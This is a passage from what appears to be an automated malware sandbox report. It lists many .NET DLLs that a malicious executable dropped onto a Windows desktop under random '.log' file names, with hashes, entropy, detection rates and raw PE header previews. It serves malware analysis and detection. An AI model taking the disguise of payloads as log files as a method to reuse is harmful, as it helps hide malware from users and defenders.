SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\AqtFBGCA.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\AxYXcbrb.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BHGUMQKM.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\BlGuwWUx.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BoVNXGRv.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BspVIDPh.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\BuzfybGV.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CGYwsYXe.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CVklKbNA.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CdYNaVtP.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CmCLCTge.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CoiFKLru.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CuOMrhud.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\DCRfugzr.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\DeVdhSGw.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DnOOjYsU.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DoxmDQeC.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EcmNwYns.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\EkqWFYHP.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EzneeVJd.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FHqnnVdz.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
